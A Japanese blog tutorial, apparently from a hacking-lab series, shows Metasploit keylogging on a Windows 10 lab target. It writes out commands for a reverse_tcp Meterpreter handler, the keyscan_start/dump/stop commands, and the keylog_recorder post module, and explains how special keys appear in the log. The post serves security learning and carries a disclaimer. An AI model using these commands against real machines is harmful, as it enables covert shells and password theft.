はじめに
今回は、Metasploitの簡易的なキーロガーを利用する。
キーロガーの悪用によって、パスワードを奪取することが可能になる。
この記事は、「ハッキング・ラボのつくりかた」(IPUSIRON著)のP.359-363を参考にしている。
注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。
Meterpreterプロンプトのキーロガーコマンド
キーロギングする前に、meterpreterセッションを確立をしておく。
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.100
show options
exploit
セッションが確立したら、キーロガーのコマンドを実行する。
- キーロギングを開始
keyscan_start
- キーログを表示
keyscan_dump
メモ帳のテキストを削除した後、話題になっているYoutuberの名前を入力した結果
同書には、
キーログには、英数字のキーだけではなく、ShiftやCtrl、Enterの入力も記録されます。(中略) 改行は「<CR>」、バックスペースは「<^H>」となります。バックスペースや全角入力を考慮しながらキーログを解析しなければなりません。
他、Deleteキーは「<Delete>」、半角/全角キーは「<半角/全角>」、矢印キーは「<Up><Down><Left><Right>」となる。
とある。
「?」「}」「A」のような、Shiftキーを押下しながら、他のキーを押下して入力する文字や記号のキーログは次のように表示された。
キーログの解析には、上記のことに留意しなければならない。
- キーロギングを停止
keyscan_stop
Metasploitのkeylog_recorderモジュール
Metasploitのモジュール"post/windows/capture/keylog_recorder"を利用することでも、キーロギングが可能である。
sessions
//表示されるセッションのセッションIDを確認
use post/windows/capture/keylog_recorder
set session <session_id>
show options
run
オプションの内容を確認しておく。特に、変更する点はない。run
でキーロギングを実行する。
キーログは"/home/kali/.msf4/loot"のディレクトリに保存される。
キーロギングはCtrl+Cを押下して終了。
終わりに
今回で、Windows10のハッキングは終了です。
次回からは、Metasploitableを使ってLinuxサーバーへのハッキングを試していきたいと思います。